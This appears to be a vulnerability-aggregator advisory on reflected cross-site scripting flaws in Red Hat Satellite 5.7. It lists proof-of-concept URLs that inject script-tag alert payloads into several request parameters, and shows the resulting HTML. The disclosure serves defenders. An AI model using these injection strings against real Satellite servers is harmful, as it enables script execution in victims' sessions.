First published: Mon Feb 08 2016(Updated: )
Adam Willard reports the following XSS flaws in Satellite 5: /rhn/admin/BunchDetail.do?label=cobbler-sync-bunch"<script>alert(1)</script> /rhn/software/packages/NameOverview.do?package_name=sac">Test<script>alert(1)</script>&search_subscribed_channels=yes&channel_filter=539 /rhn/software/packages/NameOverview.do?package_name=sac">Test<script>alert(1)</script>&search_subscribed_channels=yes&channel_filter=539 /rhn/software/packages/NameOverview.do?package_name=sac">Test<script>alert(1)</script>&search_subscribed_channels=yes">test<script>alert(2)</script>&channel_filter=539"><script>alert(3)</script> <input type="hidden" name="package_name" value="sac">Test<script>alert(1)</script>" /> <input type="hidden" name="search_subscribed_channels" value="yes">test<script>alert(2)</script>" /> <input type="hidden" name="channel_filter" value="539"><script>alert(3)</script>" />
Credit: secalert@redhat.com
Affected Software | Affected Version | How to fix |
---|---|---|
Redhat Satellite | =5.7 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.